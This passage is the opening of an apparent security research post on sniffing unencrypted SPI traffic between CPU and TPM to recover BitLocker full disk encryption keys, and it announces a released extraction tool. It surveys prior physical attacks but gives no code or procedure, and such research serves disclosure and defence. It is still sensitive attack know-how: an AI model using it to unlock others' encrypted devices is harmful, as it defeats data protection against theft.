Full disk encryption is one of the cornerstones of modern endpoint protection. It is not only an effective method to protect sensitive data against physical theft, but it also protects data integrity against tampering attacks. If this protection method could be compromised without significant effort, it would break the fundamental idea of endpoint protection.
Over time there have been many different physical attacks against full disk encryption, such as Cold Boot attacks  that we have previously researched. In addition, various attacks based on TPM interface sniffing  or DMA  have been used to gain access to an encryption key.
In this post, we research a sniffing attack against an SPI interface of Trusted Platform Module (TPM) by using publicly available tools at a reasonable cost. In addition, we release a tool which extracts the BitLocker key from the sniffed SPI traffic.
TPM is often used to seal the full disk encryption key, and the chip itself is typically protected against a various range of different attacks. However, the communication between CPU and TPM is not encrypted by default, which leaves it vulnerable to sniffing attacks.
Capturing communication of TPM is not a new idea. For example, D. Andzakovic  demonstrated a BitLocker key extraction from the LPC bus, and J. Boone  researched an interposer attack against the I2C bus. However, there were no public research on sniffing the TPM communication from the SPI bus. 2b1af7f3a8